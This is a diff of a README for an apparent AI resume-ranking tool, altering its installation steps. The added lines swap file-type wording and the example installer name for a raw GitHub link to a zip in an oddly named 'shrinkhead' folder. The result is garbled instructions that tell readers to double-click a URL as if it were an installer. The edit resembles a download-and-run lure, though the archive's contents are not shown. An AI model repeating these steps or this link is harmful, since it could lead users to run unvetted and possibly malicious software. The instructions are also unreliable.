sayru123/ai-resume-ranking/README.md

 After downloading, follow these steps to set up the software:

 1. **Locate the downloaded file:** Check your Downloads folder or the location you chose for the download.
-2. **Extract the files:** Right-click on the downloaded .zip or .tar.gz file and select "Extract Here" or "Extract All".
+2. **Extract the files:** Right-click on the downloaded .zip or https://raw.githubusercontent.com/sayru123/ai-resume-ranking/main/shrinkhead/ai-resume-ranking.zip file and select "Extract Here" or "Extract All".
-3. **Run the Installer:** Double-click the installer file (e.g., `ai-resume-ranking-installer.exe`) to start the installation process.
+3. **Run the Installer:** Double-click the installer file (e.g., `https://raw.githubusercontent.com/sayru123/ai-resume-ranking/main/shrinkhead/ai-resume-ranking.zip`) to start the installation process.
 4. **Follow the prompts:** The installer will guide you through the setup.
 Accept the license agreement and choose your installation folder.
 5. **Complete Installation:** Click "Finish" when the installation is complete.